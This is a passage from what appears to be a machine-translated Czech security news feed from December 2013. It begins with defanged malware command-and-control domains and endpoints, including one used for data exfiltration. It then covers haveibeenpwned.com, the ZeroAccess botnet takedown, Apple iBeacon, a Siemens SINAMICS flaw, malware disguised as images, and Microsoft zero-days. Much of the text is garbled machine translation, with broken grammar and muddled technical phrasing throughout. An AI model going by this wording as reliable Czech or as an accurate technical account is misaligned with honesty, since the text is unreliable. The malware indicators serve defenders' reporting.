mashevserv [.] com / admin se zdá být admin konzole
ericpotic [.] com / task.php má podobné hodnoty připojena k ní, když je požadavek GET provádí se zdá být nějaký check-in říct serveru, že je naživu.
Příspěvky na ericpotic [.] Com / data.php jsou využívány k exfiltrating dat. Veškerá komunikace s C & C jsou nezašifrované TCP 80.
Také se zdá, tento malware má velmi malou detekci. To je vše, co v současné době mají. Pokud můžete obnovit vzorky buď na hostiteli nebo prostřednictvím paketů a jsou ochotni se o ně podělit s námi, můžete nahrát na náš kontaktní stránku .
[1] https://www.robtex.com/dns/mashevserv.com.html # graph
[2] https://www.robtex.com/dns/ericpotic.com.html # graph
[3] https:/ / www.robtex.com/ip/37.9.53.126.html # whois
[4] http://www.xylibox.com/2013/10/reversible-rovnix-passwords.html
Web ověří, zda e-mailová adresa není mezi ukradenými
7.12.2013 Bezpečnost
Server v současné době kombinuje seznam obsahující ukradených e-mailových adres v případech Adobe, Yahoo, Stratfor, Gawker a Sony. Jeho autor chce průběžně přidávat další seznamy, pokud dojde k dalším podobným krádežím dat.
Web ověří, zda e-mailová adresa není mezi ukradenými
Nový web umožňuje uživatelů internetu ověřit, zda jejich jména a hesla nebyla prozrazena v několika největších krádežích dat v posledních letech. Web, který je provozován na adrese haveibeenpwned.com, vytvořil australský softwarový architekt Troy Hunt. Lze na něm zadat a ověřit emailovou adresu proti databázím uživatelům, které unikly letos z Adobe Systems, Yahoo v roce 2012, Sony a Stratfor v roce 2011 a Gawkeru v roce 2010.
Krádež v Adobe byla odhalena v říjnu a je považována za největší známý únik uživatelských informací v historii internetu. Výsledkem incidentu byl únik přes 153 milionů záznamů, včetně e-mailových adres a nedostatečně zašifrovaných hesel uživatelů. Řada bezpečnostních oborníků vytvořila weby s podobnými funkcemi, které vyhledávají v databázi pocházející z firmy Adobe, ale Hunt se rozhodl podchytit v jedné databázi všechny podstatné krádeže z poslední doby.
Je to důležité i proto, že velké množství uživatelů zadává tytéž emailové adresy a hesla na více webech. Například v roce 2012 Hunt porovnal záznamy uniklé ze Sony a z Yahoo a zjistil, že 59 procent z uživatelů majících účte u obou společností mělo i shodná hesla.
Web haveibeenpwned.com ovšem ukládá pouze emailové adresy. Jak prozradil Hunt na svém blogu: „Hesla nejsou pro funkci databáze potřebná a upřímně, nechci ani za ně nést zodpovědnost. Celý web má sloužit pro upozornění na problém krádeží.“
Importování dat do databáze webu nebylo nijak jednoduché, samotná databáze Adobe obsahuje 153 milionů záznamů, Statfor téměř 860 000, Gawker přes 530 000, Yahoo 453 000 a Sony 37 000. Hunt ostatně věnoval část svého blogu velmi zajímavému popisu problematiky vytváření takto velké databáze. Použil pro ni cloud Microsoft Azure, původní implementace byla postavena na virtuálním stroji s Microsoft SQL serverem, který pro statistickou analýzu potřeboval 56 GB RAM.
Současná verze využívá NoSQL databázi Windows Azure Table Storage, kde se účtuje pouze spotřebované úložiště a počet databázových transakcí, nikoli – jak je na cloudech zvykem – podle spotřebované paměti a práce CPU. Cenová efektivita řešení je důležitá nejen pro současný provoz, ale i pro to, že autor hodlá ve sběru pokračovat nadále a je si jist, že díky budoucím únikům dat jeho databáze ještě výrazně poroste.
Microsoft a kamarádi se dolů ZeroAccess botnet
6.12.2013 BotNet
Microsoft křížová výprava proti botnetů zuřil včera jako Redmond, Washington, počítačového giganta a koalice činnými v trestním řízení a zabezpečení Internetu firem narušil notoricky známý ZeroAccess botnet.
ZeroAccess, nebo Sirefef jako Microsoft s oblibou říká , je malware platforma, která se zaměřuje na všechny hlavní prohlížeče a vyhledávače. Je to dvě základní funkce jsou unést výsledky vyhledávání, přesměrování uživatele na nebezpečné webové stránky hosting informace krást a další malware, a aby se zavázaly click-podvod . V minulosti, ZeroAccess prokázala sklonem pro Bitcoin těžbě stejně.
Microsoft se spojil s Evropským centrem počítačové kriminalitě Europolu (EC3), FBI, a aplikace, síťové a bezpečnostní firmy A10 Networks sundat ZeroAccess, který údajně napaden asi dva miliony strojů a stojí online reklamy firmám téměř 3 miliony dolarů za měsíc.
Zpět do starých dobrých časů (2010), botnet sundat to tak jednoduché, jak dřez-prorážení této operace velení a řízení serveru a přestane svou činnost. Alespoň z části protože toto, mnoho současných botnet manipulátory se přestěhovali do botnet architektury peer-to-peer. Tento distribuovaný botnet design znamená, že zločinci provozní ZeroAccess, by mohl vzdáleně ovládat botnet z desítek tisíc různých infikovaných počítačů. Tak, vypnutí ZeroAccess se vyžaduje koktejl právních a technických opatření.
Microsoft podal žalobu proti provozovateli botnetu je, a Texas okresní soud povolil tech obří blokovat příchozí a odchozí provoz až 18 IP adres nalezených být zapojeny do podvodu. Microsoft byl také schopný vyrvat kontrolu nad 49 domén souvisejících s ZeroAccess.
"Koordinovaná akce pořízena našich partnerů byl pomocný v narušení ZeroAccess, tyto snahy se zastaví počítačů obětí byly použity k podvodu a pomoci nám identifikovat počítače, které je třeba očistit od nákazy," řekl David Finn, ředitel a spolupracovník generální ředitel pro Microsoft Digital zločiny jednotky.
Mezitím mimo USA, Europol vypnutí 18 škodlivých IP adresy a pracoval ve spojení s Lotyšsku, Lucembursku, Švýcarsku, Nizozemsku a Německu k provedení domovní prohlídce a zabavení počítačovém serveru v souvislosti s podvodným IP adresy.
"Tato operace představuje důležitý krok v koordinovaných činností, které jsou iniciované soukromými společnostmi a zároveň umožňují donucovacím orgánům po celé Evropě pro identifikaci a vyšetřovat trestné organizace a sítě za těmito nebezpečnými botnetů, které používají škodlivý software k získání nelegálních zisků , "řekl Troels Oerting, vedoucí EC3.
Microsoft a jeho partneři realisticky na vědomí, že jejich akce proti ZeroAccess je nepravděpodobné, že by zavřel botnet dolů úplně. Nicméně, právní a technologické opatření, se domnívají, že bude výrazně narušit ZeroAccess, bránit oběti stroje z přispívá k jeho nezákonného jednání, a pravděpodobně způsobí provozovatelé botnetu k obnově.
"Pokud se hacker komunita dosud vzala na vědomí, dnešní narušení ZeroAccess botnet je dalším příkladem síly veřejného a soukromého sektoru," řekl FBI výkonný zástupce ředitele Richard McFeely. "To je důkazem naší snahy rozšířit koordinaci s firmami jako Microsoft a našimi zahraničními partnery činnými v trestním řízení - v tomto případě, Europol -. Vypnout škodlivé kybernetickým útokům a podržte zločinci odpovědnost za využívání našich občanů a podniků" počítače "
Apple začíná iBeacon sledovací systém v obchodech
6.12.2013 Mobil
Pokud jste stále ještě přemýšlel, když budoucnost se sem dostal, přestat dívat do nebe pro létající auta a podívat se na váš iPhone na příště budete chodit do obchodě Apple. Společnost právě odstartovala novou in-store iniciativu sledování, která používá Bluetooth tlačit nabídek a oznámení pro zákazníky, jak se procházet uličkami, díval se na Beats sluchátka a jeden případech Direction telefon.
Známý jako iBeacon, systém využívá Bluetooth Low Energy (BLE) tlačit oznámení uživatelům v obchodě, kteří uskutečňují iOS 7 zařízení s aplikací Apple Store nainstalovány. Uživatelé musí umožnit aplikaci je sledovat, aby mohli přijímat oznámení, ale jakmile tato možnost povolena, uživatel může najít sama zasílání nabídek na krátkodobé slevy na konkrétní produkt nebo upgrade na nový iPhone.
Technologie za iBeacon je poněkud podobný blízkého pole komunikace (NFC), v tom, že se přenáší informace na krátké vzdálenosti, ale to má některé významné rozdíly, stejně. Systém iBeacon spoléhá na síť bezdrátových vysílačů instalované v různých prostředích, jako například Apple obchodů nebo nákupních center nebo stadiony-, které mohou poslat vlastní nabídky a další informace k zařízením, které mají nainstalován specifické aplikace. Tak, například, uživatel, který se vejde do Yankee Stadium s cca MLB nainstalován, což je iBeacon povolen , mohl získat interaktivní průvodce na stadion či informací na jídlo a pití speciality na různé koncese stojí.
Jedná se o druh umístění a kontextové reklamy a sledování, které zastánci ochrany osobních údajů byly obavy o již mnoho let. Současná generace chytrých telefonů všech přijít s technologií GPS postavena v roce, který umožňuje některé druhy sledování, ale systém iBeacon je samostatný zvíře. To může být použit pro mnoho různých funkcí a uživatelé potřebují, aby jejich aplikace sledovat je, aby pro daný druh případů použití, jako zkušenosti Apple Store pracovat.
Systém iBeacon a jiní, jako by to mohlo být rozšířena pro použití v celé řadě jiných prostředích, stejně, jako jsou systémy veřejné dopravy, veřejných budovách nebo jiných oblastech.
Siemens Záplaty Authentication Bypass Chyba v SINAMICS ICS Software
6.12.2013 Zranitelnosti
Siemens oprava vážné vzdáleně zneužít zranitelnost ve svém softwaru SINAMICS S / G IKS, která by mohla umožnit útočníkovi, aby se libovolné akce na zranitelné instalaci, aniž byste museli ověřit.
Tato chyba ovlivňuje všechny verze produktů Siemens Sinamics S / G s verzí firmware starší než 4.6.11. ICS-CERT, pat z ministerstva pro vnitřní bezpečnost, řekl v poradní, že si není vědoma jakéhokoliv veřejnosti využívat pokusy proti této vady, ale to není důvod odkládat záplatování. Ověřování bypass zranitelnosti pro produkt, např. SINAMICS S / G, který je používán pro řízení operace disků v průmyslových zařízeních, může být velmi užitečným nástrojem pro útočníka.
"Siemens identifikoval ověřovací bypass zranitelnost v produktové řady SINAMICS S / G. Siemens vyrábí aktualizaci firmware, která snižuje riziko zneužití této zranitelnosti a byl testován aktualizaci ověřit, že řeší chyby zabezpečení. Využití této chyby zabezpečení by mohla umožnit útočníkovi přístup k administrativní funkce přístroje bez ověření, " poradní ICS-CERT říká.
"Postiženy produkt, SINAMICS S / G rodiny, se používá k ovládání různých pohonů, a to zejména ve strojírenství a investiční výstavby. Kromě toho, SINAMICS S / G rodina spolupracuje s řízení pohybu, které se používají ke koordinaci synchronních operací nebo složitých technologických funkcí. "
Tato chyba je považována za poměrně snadno zneužít, a Siemens uvedl, že organizace, které jsou spuštěny zranitelné verze softwaru by měli nainstalovat aktualizovaný firmware, verze 4.6.11 a 4.7. Společnost rovněž doporučuje, aby zákazníci neposkytuje přístup veřejnosti k SINAMICS rozhraní po síti.
"Jako obecné bezpečnostní opatření Siemens důrazně doporučuje, chránit přístup k rozhraní SINAMICS S / G sítě s příslušnými mechanismy. Je doporučeno dodržovat doporučené postupy zabezpečení a nakonfigurovat prostředí v souladu s provozními pokyny, aby ke spuštění zařízení v chráněném prostředí IT, "Siemens poradní říká.
Uvedení malware v obraze
6.12.2013 Viry
Spammeři aktivně šíří malware pomocí falešné upozornění jménem různých finančních a bankovních institucí, rezervace a dodávky služeb a dalších firem. Arzenál triků, které používají zločinci je neustále aktualizován. Zejména v posledních letech jsme zaznamenali řadu anglickými a německém jazyce hromadnou korespondenci, ve které se útočníci snaží skrývat malware na základě fotografií a obrázků.
V říjnu, útočníci vyslali falešné oznámení prohlašovat, že je od T-Mobile, a telekomunikačním operátorem v Německu, který řekl, že uživatelé se jim dostalo MMS. Chcete-li e-mail vypadat legitimní, adresa odesílatele obsahoval oficiální firemní domény, i když e-mail sám byl poslán z jiné adresy. Tělo e-mailu, včetně kontaktní telefonní číslo odesílatele MMS a některé obecné informace vztahující se k odesílání a přijímání multimediálních zpráv.
Předpokládá fotografie s názvem '23-10-2013 13_64_09.jpeg.exe "nebyl v těle e-mailu, ale v přiloženém archivu '23-10-2013 43_69_10.zip". Podvodníci používají populární formát souboru obrázku JPEG v názvu souboru škodlivého v naději, že by se přesvědčit příjemce, že archiv skutečně obsahovat fotografii. Nicméně, uživatelé varování by si všimnout, že přípona souboru je fakt. Exe. Tento spustitelný soubor je detekován Kaspersky Lab jako Backdoor.Win32.Androm. Tento program umožňuje bot podvodníci vzdáleně spouštět příkazy na infikovaném počítači, například stažením a spuštěním další malware bez vědomí majitele.
V listopadu, spammeři používají Instagram, na populární video a foto-sdílení službu k šíření škodlivých e-mailů. Falešné oznámení zaslané na účet této služby informovat uživatele, že jejich fotografie byly zveřejněny v Instagram. Chcete-li zobrazit obrázek, příjemci byli požádáni, aby otevřít ZIP archiv, který údajně obsahoval grafický soubor "Photo DIG9048599868.jpeg.exe". To byl ve skutečnosti Trojan.Win32.Neurevt, multifunkční robot, který krade data uložená v prohlížeči (cookies a hesel), uživatelská jména a hesla zadat na stránkách a také herní kódy. Kromě toho, že slouží ke stažení a spuštění různých programů na oběť počítači, stejně jako vytvářet botnety pro DDoS útoky. Jedním ze specifických rysů bota je pokročilé funkce navrženy tak, aby proti různých bezpečnostních řešení. Například, to může blokovat zahájení anti-virus software a služby Windows Update, nebo zabránit uživateli v návštěvě webové stránky antivirových společností.
V listopadu jsme se ještě registrován další trik, ale tentokrát to nebylo se snaží obchodovat na jméno jakéhokoliv renomované společnosti nebo služby. E-maily v této škodlivého hromadnou korespondenci napodobil osobní korespondenci mezi přátele výměně soukromé fotografie. Fascinující záhlaví zprávy pozval příjemců vidět fotografie sebe nebo své chlapce / přítelkyně. Vlastní text obsažený emotikony a nesmyslné slova. Odesílatel adresy byly generovány automaticky, i když obsahovaly jména lidí. Stejně jako v jiných obdobných hromadných zásilek, e-mail včetně přiložený archiv s údajnou fotografii, která byla ve skutečnosti spustitelný dvojitá přípona souboru. Kaspersky Lab detekuje tento obrázek jako Trojan-Downloader.Win32.Agent - Trojan, který nainstaluje falešný antivirový program na počítači oběti. Výsledkem je, že infikovaný počítač neustále ukázal vyskočí oznámení o zjištěných virů. Chcete-li je odstranit, uživatel musel koupit plnou verzi tzv. antivirové řešení. Soubor s falešný antivirový program, který je detekován u nás jako Trojan-FakeAV.Win32.SmartFortress2012.ambh.
Nebezpečný soubor v tomto archivu má příponu. Scr, který je typický pro obrazovky Windows spořiče. Oba. Scr a rozšíření. Exe viz spustitelné soubory a mohou být použity spammery k instalaci malwaru.
Jedním z hlavních cílů útočníků, kteří šíří škodlivé e-mailů je získat přístup k počítači oběti. Spammeři často využívají zvědavost a bezstarostnost lidí, aby jim pomohl, jak to udělat. Infikovaný počítač je nejen zdrojem cenných osobních informací, ale může být také použit k útokům na jiných internetových uživatelů nebo velkých organizací a firem. Vaše zdvořilost a antivirové řešení by mohlo pomoci vyhnout se případným problémům v budoucnosti.
Microsoft Chcete Patch TIFF Zero Day; Počkejte Til Příští rok pro XP Zero
6.12.2013 Zranitelnosti
Microsoft bude příští týden, zalátat zero-day zranitelnost ve svém GDI + grafické komponenty jsou využívány v cílených útoků na Blízkém východě a Asii.
Zero den seděl unpatched, protože byla zveřejněna 5.listopadu, Microsoft se uvolnit nástroj Fixit jako dočasné zmírnění. Náplast je jedním z 11 bulletinů Microsoft dnes uvedl, že se uvolní v rámci svých 12. 2013 aktualizace zabezpečení Patch Tuesday , pět z bulletinů bude kritický stupeň závažnosti.
Microsoft se potvrdí, nicméně, že nula den v ovladači NDProxy , který spravuje Microsoft Telephony API v systémech Windows XP, nebude oprava. Že nula den je také využívána v přírodě spolu s PDF využít z záplatované Adobe Reader chyby.
GDI + zranitelnost se nachází v několika verzích Windows a Office a umožňuje útočníkovi získat vzdálené spuštění kódu, ale pouze na Windows Vista, Windows Server 2008 a Office 2003 do roku 2010. Existuje chyba zabezpečení ve způsobu, jakým rozhraní GDI + návleky rukojetí obrázky ve formátu TIFF. Microsoft uvedl, že by útočník musel lákat oběti náhledu nebo otevřít škodlivý přílohy ve formátu TIFF nebo navštívit webové stránky hosting využít obraz.
Kritické záplaty Úterní řešení vzdálené spuštění kódu zranitelností v řadě produktů společnosti Microsoft, včetně nejen Windows a Office, ale Lync, Internet Explorer a Exchange. Chyby zabezpečení ve službě SharePoint, Lync, SingnalR a ASP.NET jsou mezi těmi hodnocené důležité Microsoft. Tyto chyby zabezpečení jsou především zvýhodněné otázky eskalace, stejně jako zpřístupnění informací chyba.
To bude poslední plánované vydání bezpečnostní aktualizace od společnosti Microsoft za rok. Vypadá to, že úterní aktualizace přinese počet 2013 na 106 bulletiny, ostře od 83. loňského roku, podle Qualys ČTÚ Wolfgang Kandek. Microsoft měl v podobných čísla bulletinu v roce 2011 (100) a 2010 (106).
"Co se týče 0-dnů, Microsoft dvůr soustavně upozorňuje na to, že dodatečná bezpečnostní toolkit EMET (Enhanced Mitigation Experience Toolkit) je účinná proti všem 0-day problémy v letošním roce," řekl Kandek. "Věříme, že je aktivní bezpečnostní opatření, která organizace by měla vyhodnotit a zvážit, jako další vrstvu ve svých obranných opatření."
XP zero-day, mezitím, bude pravděpodobně odešel do ledna 2014 Patch Tuesday aktualizace. Tato chyba zabezpečení je zvýšení úrovně oprávnění zranitelnost a umožňuje přístup jádra.
Vědci FireEye řekl, že našel využití ve volné přírodě používán spolu PDF založené na využití proti opravenou Adobe Reader zranitelnosti. Reader verze 9.5.4, 10.1.6, 11.0.02 a dříve na XP SP3 jsou ovlivněny, novější verze nejsou, FireEye řekl a dodal, že toto využití umožňuje lokální uživatel možnost spuštění kódu v jádře, jako je například instalace nového software, manipulovat s daty, nebo vytvářet nové účty. Využít nelze použít na dálku, uvedla firma.
Společnost Microsoft doporučuje odstranění ovladače NDProxy.sys jako řešení, zmírnění, nicméně, bude mít vliv TAPI operace.
"Správci systému Všude musí být provedeny zlobivé seznam Microsoftu, protože tento svátek" dar "je jednoznačně kus uhlí," řekl Tyler Reguly, technický ředitel bezpečnostního výzkumu a vývoje v Tripwire. "Microsoft je balil 2013 záplat sezónu s čímkoli, co bylo, kterým se kolem sebe. Někdo by měl říct, Microsoft zapomněli zahrnout dřezu. "